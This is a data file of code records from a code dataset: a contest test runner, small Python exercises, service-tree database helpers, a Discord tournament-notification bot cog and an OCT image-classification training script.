mem_div = 4\n    os.remove(mem_filename + '.c')\n    os.remove(mem_filename)\n    with open(config_path, 'a') as f:\n        f.write('\\n# Do not touch mem_div unless you know what you are doing.\\n')\n        f.write('mem_div=' + str(mem_div) + '\\n')\n\ntests = []\nif os.path.isdir('./tests'):\n    for f in os.listdir('./tests'):\n        if f.startswith(task_shortname) and f.endswith('.in'):\n            # slice off the prefix/suffix by length; lstrip/rstrip strip character sets, not substrings\n            tests.append(f[len(task_shortname):-len('.in')])\nelse:\n    print('Directory ./tests not found.')\n    sys.exit(0)\ntests = sorted(tests)\n\nif len(tests) == 0:\n    print('No tests matching the filename: ./tests/' + task_shortname + '*.in found.')\n\nfor test in tests:\n    test_name = task_shortname + test\n    print(test_name + ': ', end='')\n    exec_time, exec_mem_used, exec_error = time_command(program_name + ' < tests/' + test_name + '.in' + ' > tmp.out')\n    if exec_error:\n        print(COLOR_RED + exec_error + COLOR_END)\n        continue\n    exec_mem_used = format(exec_mem_used, '.2f')\n    if float(exec_time) > time_limit:\n        exec_time = COLOR_RED + exec_time + COLOR_END\n    if task_shortname in tasks and 'memory_limit' in tasks[task_shortname] and float(exec_mem_used) > tasks[task_shortname]['memory_limit']:\n        exec_mem_used = COLOR_RED + exec_mem_used + COLOR_END\n    print(exec_time + ' s, ' + exec_mem_used + ' MB')\n    spaces = ((len(test_name)+2)*' ')\n    print(spaces, end='')\n    if not os.path.isfile('tests/' + test_name + '.out'):\n        print(COLOR_BLUE + '??' + COLOR_END + ', no output file to compare')\n        continue\n    correct_out, user_out = '', ''\n    with open('tmp.out', 'r') as f:\n        user_out = f.read().split('\\n')\n    with open('tests/' + test_name + '.out', 'r') as f:\n        correct_out = f.read().split('\\n')\n    user_out = [ line.strip() for line in user_out if line.strip() != '' ]\n    correct_out = [ line.strip() for line in correct_out if line.strip() != '' ]\n    if len(user_out) != len(correct_out):\n        print(wa_text + ', user output has ' + str(len(user_out)) + ' line(s), ' + correct_text + ' output has ' + str(len(correct_out)) + ' line(s)')\n    else:\n        ok = True\n        for i in range(0, len(user_out)):\n            if user_out[i] != correct_out[i]:\n                print(wa_text + ', files different in line #' + str(i+1))\n                print(spaces + 'user output: \\t' + user_out[i])\n                print(spaces + correct_text + ' output:\\t' + correct_out[i])\n                ok = False\n                break\n        if ok:\n            print(ok_text)\n\nif os.path.isfile('tmp.out'):\n    os.remove('tmp.out')\nif os.path.isfile('time.txt'):\n    os.remove('time.txt')\n","sub_path":"test_task.py","file_name":"test_task.py","file_ext":"py","file_size_in_byte":9850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"99214978","text":"#!/usr/bin/python3\n\ndef addList(numList):\n\tnumList.append(10)\n\tsum = 0\n\tfor i in numList:\n\t\tsum += i\n\treturn sum\n\n\nnumlist = [1,2,3,4]\nprint (numlist)\n# Lists are passed by reference\nres = addList(numlist)\nprint (numlist)\nprint (res)\n\ndef addNum(x, y):\n\tx += y\n\treturn x\n\nx = 10\ny = 20\nprint(x, ' ', y)\nprint(addNum(x, y))\n# Basic types are passed by value\nprint(x, ' ', y)\n\ndef appendString(a, b):\n\ta += b\n\treturn a\n\na = \"Tej\"\nb = \"Babu\"\nprint(a,b)\nprint(appendString(a,b))\n# String is a basic datatype\nprint(a,b)\n\n","sub_path":"python/07-functions.py","file_name":"07-functions.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"654473091","text":"import unittest\nfrom mock import patch\nfrom stepik.pattern_matching import find\n\nfrom io import 
StringIO\n\n\nclass TestStepikPatternProblem(unittest.TestCase):\n    @patch('sys.stdin', StringIO('aba\\nabacaba'))\n    def test_first(self):\n        output_row = '0 4'\n        self.assertEqual(find(), output_row)\n\n    @patch('sys.stdin', StringIO('Test\\ntestTesttesT'))\n    def test_second(self):\n        output_row = '4'\n        self.assertEqual(find(), output_row)\n\n    @patch('sys.stdin', StringIO('aaaaa\\nbaaaaaaa'))\n    def test_third(self):\n        output_row = '1 2 3'\n        self.assertEqual(find(), output_row)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"stepik/tests/pattern_matching_test.py","file_name":"pattern_matching_test.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314416456","text":"import rectangle\n\ndef getSquare(initialPos, endPos):\n    (x0, y0) , (x1, y1) = initialPos, endPos\n\n    dx = abs(x1 - x0)\n    dy = abs(y0 - y1)\n\n    if dx > dy:\n        if y0 > y1:\n            y1 = y0 - dx\n        else:\n            y1 = y0 + dx\n    else:\n        if x0 > x1:\n            x1 = x0 - dy\n        else:\n            x1 = x0 + dy\n    return (x0, y0), (x1, y1)\n\n\ndef biggerSmaller(x, y):\n    if x > y:\n        bigger = x\n        smaller = y\n    else:\n        bigger = y\n        smaller = x\n    return bigger, smaller\n\ndef drawSquare(initialPos, endPos):\n    (x0, y0) , (x1, y1) = getSquare(initialPos, endPos)\n    \n    for pixel in rectangle.drawRectangle((x0, y0), (x1, y1)):\n        yield pixel\n\ndef special():\n    return False","sub_path":"trabalho 1/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"231271819","text":"# -*- coding:utf-8 -*-\n#\n# Copyright @ 2019 OPS Inc.\n#\n# Author: Jinlong Yang\n#\n\nfrom sqlalchemy import text\nfrom oslo_log import log as logging\nfrom osmo.db import get_session, model_query\n\nfrom stree.db.model import (\n    Tpl,\n    Node,\n    Instance,\n    Key,\n    Val\n)\n\nLOG = logging.getLogger(__name__)\n\n\nclass STreeOperMixin(object):\n\n    def add_node(self, username, data):\n        leaf = data.get('leaf')\n        pnode = data.get('pnode')\n        new_node = data.get('new_node')\n        new_node_path = '%s.%s' % (pnode, new_node)\n        self._add(username, new_node, new_node_path, leaf, data)\n\n        # NOTE(non-leaf nodes at the owt level automatically get a backpool child)\n        if len(new_node_path.split('.')) == 3 and int(leaf) == 0:\n            backpool_path = '%s.backpool' % new_node_path\n            print (backpool_path)\n            self._add(username, 'backpool', backpool_path, 1, data)\n\n    def _add(self, username, name, new_node_path, leaf, data):\n        tpl = data.get('tpl')\n        session = get_session()\n        with session.begin(subtransactions=True):\n            node = session.query(Node)\\\n                .filter(Node.name == new_node_path)\\\n                .first()\n            if not node:\n                tpl_obj = session.query(Tpl)\\\n                    .filter(Tpl.alias == tpl)\\\n                    .first()\n                node = Node()\n                node.name = name\n                node.tpl_id = tpl_obj.id\n                node.leaf = int(leaf)\n                node.node = new_node_path\n                node.op = data.get('op')\n                node.rd = data.get('rd')\n                session.add(node)\n                LOG.info('** user: %s added new node: %s successfully.'\n                         % (username, new_node_path))\n\n    def del_node(self, username, data):\n        node = data.get('node')\n        session = get_session()\n        with session.begin(subtransactions=True):\n            sql = text('select * from tb_node where node <@ :node')\n            r = session.execute(sql, {'node': node})\n            print (r)\n            for row in r:\n                print (row)\n\n    def ren_node(self, username, data):\n        pass\n\n    def add_instance(self, username, data):\n        node = data.get('node')\n        ips = data.get('ips')\n        ip_list = ips.split('\\n')\n        session = get_session()\n        with session.begin(subtransactions=True):\n            
instance_list = []\n            node_obj = session.query(Node)\\\n                .filter(Node.node == node)\\\n                .first()\n            for ip in ip_list:\n                instance = Instance()\n                instance.node_id = node_obj.id\n                instance.ip = ip\n                instance.hostname = 'l-pad.ops.cn9'\n                instance_list.append(instance)\n            session.add_all(instance_list)\n\n\nclass STreeDataMixin(object):\n\n    def query_tree(self):\n        # TODO: query only the nodes the current user is authorized to see\n        tree_list = []\n        node_list = model_query(Node).all()\n        for model in node_list:\n            data = {}\n            node = model.node\n            section_list = node.rsplit('.', 1)\n            if len(section_list) == 1:\n                root = node\n                data['id'] = root\n                data['pid'] = root\n                data['name'] = root\n                data['open'] = True\n                data['isParent'] = 0 if model.leaf else 1\n                tree_list.append(data)\n                continue\n            pid = section_list[0]\n            name = section_list[1]\n            data['id'] = node\n            data['pid'] = pid\n            data['name'] = name\n            data['isParent'] = 0 if model.leaf else 1\n            tree_list.append(data)\n        expand_node = min(tree_list,\n                          key=lambda arg: len(arg.get('id'))).get('id')\n        return {\n            'tree_list': tree_list,\n            'expand_node': expand_node\n        }\n\n    def query_tpl(self):\n        tpl_list = model_query(Tpl).all()\n        return list(map(lambda m: m.alias, tpl_list))\n\n    def query_instance(self, username, data):\n        result_list = []\n        node = data.get('node')\n        offset = data.get('offset')\n        session = get_session()\n        instances = session.query(Instance).join(Node)\\\n            .filter(Node.node == node)\\\n            .order_by(Instance.id)\\\n            .limit(10)\\\n            .offset(offset)\\\n            .all()\n        for model in instances:\n            hostinfo = {\n                'ip': model.ip,\n                'hostname': model.hostname,\n                'status': model.active,\n                'deploy': '',\n                'crontab': '',\n                'operation': ''\n            }\n            for item in model.vals:\n                if model.id == item.instance_id:\n                    hostinfo.update({\n                        item.key.key: item.value\n                    })\n                    break\n            result_list.append(hostinfo)\n        count = session.query(Instance).join(Node)\\\n            .filter(Node.node == node)\\\n            .count()\n        return {\n            'instances': result_list,\n            'total': count\n        }\n\n    def query_node_info(self, username, data):\n        node = data.get('node')\n        session = get_session()\n        node_obj = session.query(Node)\\\n            .filter(Node.node == node)\\\n            .first()\n        return {\n            'op': node_obj.op,\n            'rd': node_obj.rd,\n            'tpl': node_obj.tpl.alias\n        }\n","sub_path":"stree/fe/bll/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"505993723","text":"import discord\nfrom wlct.models import Clan, Player, DiscordUser, DiscordChannelClanFilter, DiscordChannelPlayerFilter, DiscordChannelTournamentLink, DiscordTournamentUpdate\nfrom wlct.tournaments import Tournament, TournamentTeam, TournamentGame, TournamentPlayer, MonthlyTemplateRotation, get_games_finished_for_team_since, find_tournament_by_id, get_team_data_no_clan, RealTimeLadder, get_real_time_ladder, ClanLeagueTournament, get_multi_day_ladder, TournamentGameEntry, TournamentRound, get_team_data_no_clan_player_list\nfrom discord.ext import commands, tasks\nfrom django.utils import timezone\nfrom traceback import print_exc\nfrom wlct.logging import log_exception, log, LogLevel, Logger, log_bot_msg, log_cb_msg\nfrom wlct.api import API\nimport gc\nimport datetime\nimport pytz\nimport urllib.request\nimport json\nfrom wlct.clotbook import DiscordChannelCLOTBookLink, get_clotbook, BetGameOdds, BetTeamOdds, Bet\nfrom channels.db import database_sync_to_async\nimport asyncio\n\nclass Tasks(commands.Cog, name=\"tasks\"):\n    def __init__(self, bot):\n        self.bot = bot\n        
self.last_task_run = timezone.now()\n        self.executions = 0\n        self.bg_task.start()\n        self.orm_helpers = DjangoORMHelpers()\n\n    async def handle_rtl_tasks(self):\n        ladders = RealTimeLadder.objects.all()\n        for ladder in ladders:\n            games = self.orm_helpers.get_rtl_games(ladder)\n            # cache the game data + link for use with the embed\n            emb = discord.Embed(color=self.bot.embed_color)\n            emb.set_author(icon_url=self.bot.user.avatar_url, name=\"WarzoneBot\")\n            emb.title = \"New Ladder Game Created\"\n            emb.set_footer(text=\"Bot created and maintained by -B#0292\")\n            for game in games:\n                data = \"\"\n                team1 = game.teams.split('.')[0]\n                team2 = game.teams.split('.')[1]\n                player1 = ladder.get_player_from_teamid(team1)\n                player2 = ladder.get_player_from_teamid(team2)\n                if player1.discord_member and player2.discord_member:\n                    data += \"<@{}> vs. <@{}> [Game Link]({})\\n\".format(player1.discord_member.memberid, player2.discord_member.memberid,\n                                                                      game.game_link)\n                elif player1.discord_member:\n                    data += \"<@{}> vs. <{}> [Game Link]({})\\n\".format(player1.discord_member.memberid, player2.name,\n                                                                     game.game_link)\n                elif player2.discord_member:\n                    data += \"<{}> vs. <@{}> [Game Link]({})\\n\".format(player1.name, player2.discord_member.memberid,\n                                                                     game.game_link)\n                else:\n                    # neither player has a linked discord account; skip to the next game\n                    game.mentioned = True\n                    game.save()\n                    continue\n                emb.add_field(name=\"Game\", value=data, inline=True)\n                if player1 and player1.discord_member:\n                    user = self.bot.get_user(player1.discord_member.memberid)\n                    if user:\n                        try:\n                            await user.send(embed=emb)\n                        except:\n                            log_bot_msg(\"Could not send RTL game msg to {} \".format(player1.name))\n                if player2 and player2.discord_member:\n                    user = self.bot.get_user(player2.discord_member.memberid)\n                    if user:\n                        try:\n                            await user.send(embed=emb)\n                        except:\n                            log_bot_msg(\"Could not send RTL game msg to {} \".format(player2.name))\n                game.mentioned = True\n                game.save()\n\n    async def handle_clan_league_next_game(self):\n        clt = ClanLeagueTournament.objects.filter(is_finished=False)\n        for t in clt:\n            # get the time until next game allocation\n            start_times = t.games_start_times.split(';')\n\n            # always take the next (first) one\n            if len(start_times[0]) >= 8: # every start time is a day/month/year, and we need at least 8 characters\n                next_start = datetime.datetime.strptime(start_times[0], \"%m.%d.%y\")\n                diff = next_start - datetime.datetime.utcnow()\n                # diff is our delta, compute how many days, hours, minutes remaining\n\n    async def handle_clotbook(self):\n        channel_links = DiscordChannelCLOTBookLink.objects.filter(results_only=False)\n        odds_created_sent = []\n        odds_finished_sent = []\n        cb = get_clotbook()\n        try:\n            for cl in channel_links:\n                channel = self.bot.get_channel(cl.channelid)\n                if hasattr(self.bot, 'uptime') and channel:\n                    bet_odds = BetGameOdds.objects.filter(sent_created_notification=False, initial=True).order_by('created_time')\n                    for bo in bet_odds:\n                        if not cl.does_game_pass_filter(bo.game):\n                            odds_created_sent.append(bo)\n                            continue\n                        emb = self.bot.get_default_embed()\n                        emb = cb.get_initial_bet_card(bo, emb)\n                        await channel.send(embed=emb)\n                        odds_created_sent.append(bo)\n\n            channel_links = DiscordChannelCLOTBookLink.objects.filter(results_only=True)\n            for cl in channel_links:\n                channel = self.bot.get_channel(cl.channelid)\n                if hasattr(self.bot, 'uptime') and channel:\n                    bet_odds = BetGameOdds.objects.filter(sent_finished_notification=False, game__is_finished=True)\n                    print(\"Found {} finished bet game odds\".format(bet_odds.count()))\n                    for bo in bet_odds:\n                        if bo.game.winning_team:\n                            if not 
cl.does_game_pass_filter(bo.game):\n odds_finished_sent.append(bo)\n continue\n emb = self.bot.get_default_embed()\n emb = cb.get_bet_results_card(bo, emb)\n if emb:\n await channel.send(embed=emb)\n odds_finished_sent.append(bo)\n except Exception:\n log_exception()\n finally:\n for odds in odds_created_sent:\n odds.sent_created_notification = True\n odds.save()\n for odds in odds_finished_sent:\n odds.sent_finished_notification = True\n odds.save()\n\n async def handle_game_logs(self):\n channel_links = DiscordChannelTournamentLink.objects.all()\n games_sent = []\n try:\n for cl in channel_links:\n channel = self.bot.get_channel(cl.channelid)\n # for each channel, see if there are any new games that have finished in the tournament that's linked\n # only look at games that have finished times greater than when the bot started\n game_log_text = \"\"\n if hasattr(self.bot, 'uptime') and channel:\n games = self.orm_helpers.get_game_logs_for_tournament(cl.tournament, self.bot.uptime-datetime.timedelta(days=3))\n if len(games) > 0:\n log_bot_msg(\"Found {} games to log in channel {}\".format(len(games), channel.name))\n for game in games:\n if game.game_finished_time is None and game.winning_team or not game.winning_team:\n continue # ignore games with no finished time (which might be 0 and returned in this query)\n # we have the game, construct the log text and send it to the channel\n\n # Check if game passes player/clan filter\n if not cl.does_game_pass_filter(game):\n games_sent.append(game)\n continue\n\n # bold the clans if any, and italicize\n teams = game.teams.split('.')\n team_list = []\n team_list.append(game.winning_team.id)\n for team in teams:\n if int(team) not in team_list:\n team_list.append(int(team))\n\n player_team_id_list = None\n if game.players:\n player_team_id_list = game.players.split(\"-\")\n\n wrote_defeats = False\n for team in team_list:\n tt = TournamentTeam.objects.filter(pk=team)\n if tt:\n tt = tt[0]\n # look up the clan for this team, and bold/write the clan name in there.\n if tt.clan_league_clan and tt.clan_league_clan.clan:\n game_log_text += \"**{}** \".format(tt.clan_league_clan.clan.name)\n\n # if game has 'players' value, use that otherwise get names from TournamentPlayer\n if player_team_id_list:\n tplayers = player_team_id_list[teams.index(str(team))].split(\".\")\n else:\n tplayers = TournamentPlayer.objects.filter(team=tt)\n\n for tplayer in tplayers:\n if player_team_id_list:\n player_name = Player.objects.filter(token=tplayer)\n player_name = player_name[0].name\n else:\n player_name = tplayer.player.name\n game_log_text += \"*{}*, \".format(player_name)\n\n game_log_text = game_log_text[:-2]\n if not wrote_defeats:\n game_log_text += \" defeats \"\n wrote_defeats = True\n\n tournament = find_tournament_by_id(game.tournament.id, True)\n if tournament and hasattr(tournament, 'clan_league_template') and tournament.clan_league_template:\n game_log_text += \"\\n{}\".format(tournament.clan_league_template.name)\n\n game_log_text += \"\\n<{}>\".format(game.game_link)\n\n log_bot_msg(\"Looping through channels to log: {}, length: {}\".format(game_log_text, len(game_log_text)))\n if channel and len(game_log_text) > 0:\n log_bot_msg(\"Sending game_log to channel: {}\".format(channel.name))\n try:\n await channel.send(game_log_text)\n games_sent.append(game)\n game_log_text = \"\"\n except:\n log_bot_msg(\"Exception: {} when sending message to server {}, channel {}\".format(log_exception(), channel.guild.name, channel.name))\n\n except Exception:\n 
log_exception()\n finally:\n for g in games_sent:\n g.game_log_sent = True\n g.save()\n\n async def handle_server_stats(self):\n pass\n\n async def handle_hours6_tasks(self):\n #await self.handle_clan_league_next_game()\n pass\n\n async def handle_hours4_tasks(self):\n # every 4 hours we currently only send clan league updates\n pass\n\n async def handle_hours_tasks(self):\n pass\n\n async def handle_day_tasks(self):\n await self.handle_server_stats()\n\n async def handle_no_winning_team_games(self):\n games = TournamentGame.objects.filter(winning_team__isnull=True, is_finished=True, no_winning_team_log_sent=False)\n msg = \"\"\n if games:\n msg += \"**Games finished with no winning team found**\"\n for game in games:\n for cc in self.bot.critical_error_channels:\n msg += \"\\n{} | ID: {} \\nLink: <{}> \\nLogs: \".format(game.tournament.name, game.gameid, game.game_link, game.gameid)\n msg = msg[:1999]\n await cc.send(msg)\n game.no_winning_team_log_sent = True\n game.save()\n msg = \"\"\n\n async def handle_rt_ladder(self):\n tournaments = Tournament.objects.filter(has_started=True, is_finished=False)\n for tournament in tournaments:\n child_tournament = find_tournament_by_id(tournament.id, True)\n if child_tournament and not child_tournament.should_process_in_engine():\n try:\n child_tournament.update_in_progress = True\n child_tournament.save()\n games = TournamentGame.objects.filter(is_finished=False, tournament=tournament)\n for game in games.iterator():\n # process the game\n # query the game status\n child_tournament.process_game(game)\n # in case tournaments get stalled for some reason\n # for it to process new games based on current tournament data\n child_tournament.process_new_games()\n await self.handle_rtl_tasks()\n except Exception as e:\n log_exception()\n finally:\n child_tournament.update_in_progress = False\n child_tournament.save()\n gc.collect()\n\n async def handle_process_queue(self):\n for i in range(0, len(self.bot.process_queue)):\n gc.collect()\n t = find_tournament_by_id(self.bot.process_queue[i], True)\n if t:\n print(\"Processing data for {}\".format(t.name))\n games = TournamentGame.objects.filter(is_finished=False, tournament=t)\n for game in games.iterator():\n # process the game\n # query the game status\n t.process_game(game)\n gc.collect()\n t.process_new_games()\n self.bot.process_queue.pop(i)\n\n async def handle_cache_queue(self):\n for i in range(0, len(self.bot.cache_queue)):\n gc.collect()\n t = find_tournament_by_id(self.bot.cache_queue[i], True)\n if t:\n print(\"Caching data for {}\".format(t.name))\n t.cache_data()\n self.bot.cache_queue.pop(i)\n\n async def handle_critical_errors(self):\n logs = self.orm_helpers.get_critical_errors()\n if logs:\n for log in logs:\n for cc in self.bot.critical_error_channels:\n msg = \"**Critical Log Found**\\n\"\n msg += log.msg\n msg = msg[:1999]\n await cc.send(msg)\n await asyncio.sleep(1)\n log.bot_seen = True\n log.save()\n\n async def handle_discord_tournament_updates(self):\n try:\n updates = self.orm_helpers.get_tournament_updates()\n for u in updates:\n # look up the tournament, and get all channel links for that tournament\n channel_links = self.orm_helpers.get_channel_tournament_links(u.tournament)\n for c in channel_links:\n channel = self.bot.get_channel(c.channelid)\n if channel:\n await channel.send(u.update_text)\n u.bot_send = True\n u.save()\n except:\n log_exception()\n\n async def handle_all_tasks(self):\n # calculate the time different here\n # determine if we need hours run or 4 hours 
run\n # for 1 hour, executions should be 360\n start = datetime.datetime.utcnow()\n hours = (self.executions % 360 == 0)\n hours4 = (self.executions % (360*4) == 0)\n hours6 = (self.executions % (360*6) == 0)\n day = (self.executions % (360*24) == 0)\n two_minute = (self.executions % 12 == 0)\n\n try:\n if hours:\n await self.handle_hours_tasks()\n if hours4:\n await self.handle_hours4_tasks()\n if hours6:\n await self.handle_hours6_tasks()\n if day:\n await self.handle_day_tasks()\n if two_minute:\n start = datetime.datetime.utcnow()\n await self.handle_rt_ladder()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"RT Ladder Tasks took {} total seconds\".format((end-start).total_seconds()))\n\n # always tasks\n start = datetime.datetime.utcnow()\n await self.handle_always_tasks()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Always Tasks took {} total seconds\".format((end-start).total_seconds()))\n except Exception:\n log_exception()\n finally:\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"All Tasks took {} total seconds\".format((end-start).total_seconds()))\n gc.collect()\n\n async def handle_always_tasks(self):\n start = datetime.datetime.utcnow()\n await self.handle_critical_errors()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Critical Errors Tasks took {} total seconds\".format((end-start).total_seconds()))\n start = datetime.datetime.utcnow()\n await self.handle_game_logs()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Game Logs Tasks took {} total seconds\".format((end-start).total_seconds()))\n start = datetime.datetime.utcnow()\n await self.handle_cache_queue()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Cache queue took {} total seconds\".format((end-start).total_seconds()))\n start = datetime.datetime.utcnow()\n await self.handle_process_queue()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Process queue took {} total seconds\".format((end-start).total_seconds()))\n start = datetime.datetime.utcnow()\n await self.handle_discord_tournament_updates()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"Tournament updates Tasks took {} total seconds\".format((end-start).total_seconds()))\n start = datetime.datetime.utcnow()\n await self.handle_clotbook()\n end = datetime.datetime.utcnow()\n self.bot.perf_counter(\"CLOTBook Tasks took {} total seconds\".format((end-start).total_seconds()))\n\n async def process_member_join(self, memid):\n member = self.bot.get_user(memid)\n if member:\n send_message = False\n discord_user = DiscordUser.objects.filter(memberid=memid)\n emb = discord.Embed(color=self.bot.embed_color)\n emb.set_author(icon_url=self.bot.user.avatar_url, name=\"WarzoneBot\")\n emb.title = \"It's nice to meet you!\"\n emb.set_footer(text=\"Bot created and maintained by -B#0292\")\n msg = \"Hello {},\\n\\nI'm a homemade Warzone Discord Bot. \\n\\nI'm reaching out because your discord account\".format(\n member.name)\n msg += \" is not linked to the CLOT (custom ladder or tournament). 
Please see http://wzclot.eastus.cloudapp.azure.com/me/ for instructions\"\n msg += \" on how to link the two accounts together.\\n\\nThis will allow you to participate in the bot's\"\n msg += \" new real-time-ladder, as well as help to become verified in the Warzone discord server.\"\n emb.add_field(name=\"Welcome\", value=msg)\n\n if not discord_user:\n discord_user = DiscordUser(memberid=memid)\n discord_user.save()\n else:\n discord_user = discord_user[0]\n\n if not discord_user.link_mention:\n print(\"Sending welcome message to {}\".format(member.name))\n await member.send(embed=emb)\n discord_user.link_mention = True\n discord_user.save()\n\n @tasks.loop(seconds=10.0)\n async def bg_task(self):\n # runs every 10 seconds to check various things\n # are there any new games on the RTL that just got allocated?\n try:\n await self.bot.wait_until_ready()\n owner = self.bot.owner\n await self.handle_all_tasks()\n self.last_task_run = timezone.now()\n self.executions += 1\n except:\n print_exc()\n raise\n\nclass DjangoORMHelpers():\n\n def get_critical_errors(self):\n return list(Logger.objects.filter(level=LogLevel.critical, bot_seen=False))\n\n def get_tournament_updates(self):\n return list(DiscordTournamentUpdate.objects.filter(bot_send=False))\n\n def get_channel_tournament_links(self, tournament):\n return list(DiscordChannelTournamentLink.objects.filter(tournament=tournament))\n\n def get_rtl_games(self, ladder):\n return list(TournamentGame.objects.filter(tournament=ladder, is_finished=False, mentioned=False))\n\n def get_game_logs_for_tournament(self, tournament, time_since):\n return list(TournamentGame.objects.filter(is_finished=True, tournament=tournament, game_finished_time__gt=(time_since), game_log_sent=False))\n\ndef setup(bot):\n bot.add_cog(Tasks(bot))","sub_path":"wlct/cogs/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":21928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"605814455","text":"gpus = \"0,1\"\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = gpus\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport cv2\nimport glob\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nfrom sklearn.metrics import accuracy_score, cohen_kappa_score\nfrom sklearn.model_selection import StratifiedKFold, GroupKFold\n\nimport timm\nimport torch\nimport torch.nn as nn\nimport albumentations as A\nimport pytorch_lightning as pl\nfrom albumentations.pytorch import ToTensorV2\nfrom torch.utils.data import Dataset, DataLoader\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom utils.loss.smooth import LabelSmoothingLoss\nfrom utils.mixup import mixup_data, mixup_criterion\npl.seed_everything(0)\n\n\nclass Model(pl.LightningModule):\n def __init__(self, **args):\n super(Model, self).__init__()\n for k, v in args.items():\n setattr(self, k, v)\n self.args = args\n self.model = timm.create_model(self.model_name, pretrained = True, in_chans = 1, num_classes = self.num_classes, drop_rate = self.drop_rate)\n self.criterion = LabelSmoothingLoss(classes = self.num_classes, smoothing = self.smoothing)\n self.save_hyperparameters()\n\n class Data(Dataset):\n def __init__(self, df, trans, **args):\n self.df = df\n self.trans = trans\n for k, v in args.items():\n setattr(self, k, v)\n \n def __getitem__(self, idx):\n image = np.array(Image.open(self.df.loc[idx, \"oct_file\"]))\n label = np.array(self.df.loc[idx, \"label\"])\n\n if self.trans is not None:\n image = self.trans(image = 
image)[\"image\"]\n return image, label\n\n def __len__(self):\n return len(self.df)\n\n def prepare_data(self):\n img_files = sorted(glob.glob(\"./data/train/images/*/*_crop.jpg\"))\n oct_files = sorted(glob.glob(\"./data/train/images/*/*/*_crop.png\"))\n\n labels = pd.read_csv(\"./data/train/train.csv\")\n labels[\"label\"] = labels.non + 2 * labels.early + 3 * labels.mid_advanced - 1\n labels[\"uid\"] = labels.pop(\"data\")\n\n df_img = pd.DataFrame({\"img_file\": img_files})\n df_img[\"uid\"] = df_img.img_file.apply(lambda x: int(os.path.basename(os.path.dirname(x))))\n df_oct = pd.DataFrame({\"oct_file\": oct_files})\n df_oct[\"uid\"] = df_oct.oct_file.apply(lambda x: int(os.path.basename(os.path.dirname(x))))\n df_oct = df_oct.iloc[::5]\n\n df = labels.merge(df_img, on = \"uid\", how = \"outer\").merge(df_oct, on = \"uid\", how = \"outer\")\n df = df.reset_index(drop = True)\n\n split = GroupKFold(5)\n train_idx, valid_idx = list(split.split(df, groups = df.uid))[self.fold]\n self.df_train = df.loc[train_idx].reset_index(drop = True) if self.fold != -1 else df.reset_index(drop = True)\n self.df_valid = df.loc[valid_idx].reset_index(drop = True)\n self.ds_train = self.Data(self.df_train, self.trans_train, **self.args)\n self.ds_valid = self.Data(self.df_valid, self.trans_valid, **self.args)\n\n def train_dataloader(self):\n return DataLoader(self.ds_train, self.batch_size, shuffle = True, num_workers = 4)\n\n def val_dataloader(self):\n return DataLoader(self.ds_valid, self.batch_size, num_workers = 4)\n\n def configure_optimizers(self):\n optimizer = torch.optim.AdamW(self.model.parameters(), lr = self.learning_rate, weight_decay = 2e-5)\n lr_scheduler = {'scheduler': torch.optim.lr_scheduler.OneCycleLR(optimizer, max_lr = self.learning_rate, steps_per_epoch = int(len(self.train_dataloader())), epochs = self.num_epochs, anneal_strategy = \"linear\", final_div_factor = 30,), 'name': 'learning_rate', 'interval':'step', 'frequency': 1}\n return [optimizer], [lr_scheduler]\n\n def on_fit_start(self):\n metric_placeholder = {\"valid_metric\": 0}\n self.logger.log_hyperparams(self.hparams, metrics = metric_placeholder)\n\n def forward(self, x):\n yhat = self.model(x)\n return yhat\n\n def training_step(self, batch, batch_idx):\n x, y = batch\n if self.alpha != 0:\n x, ya, yb, lam = mixup_data(x, y, self.alpha)\n yhat = self(x)\n loss = mixup_criterion(self.criterion, yhat, ya, yb, lam)\n else:\n yhat = self(x)\n loss = self.criterion(yhat, y)\n self.log(\"train_loss\", loss)\n return loss\n\n def validation_step(self, batch, batch_idx):\n x, y = batch\n yhat = self(x)\n loss = self.criterion(yhat, y)\n self.log(\"valid_loss\", loss, prog_bar = True)\n return y, yhat\n\n def validation_step_end(self, output):\n return output\n\n def validation_epoch_end(self, outputs):\n y = torch.cat([_[0] for _ in outputs]).detach().cpu().numpy()\n yhat = torch.cat([_[1] for _ in outputs]).argmax(1).detach().cpu().numpy()\n df = self.val_dataloader().dataset.df.iloc[:len(y)]\n df[\"pred\"] = yhat\n y = df.groupby(\"uid\").agg(\"mean\").label.round().astype(int)\n yhat = df.groupby(\"uid\").agg(\"mean\").pred.round().astype(int)\n kap = cohen_kappa_score(y, yhat, weights = \"quadratic\")\n self.log(\"valid_metric\", kap, prog_bar = True)\n\nargs = dict(\n learning_rate = 1e-3,\n model_name = \"tf_efficientnet_b0_ns\",\n num_epochs = 30,\n batch_size = 64,\n fold = 4,\n num_classes = 3,\n smoothing = 0.,\n alpha = 1,\n image_size = 384,\n drop_rate = 0.5,\n swa = False,\n name = \"OCT/b0ns\",\n version = 
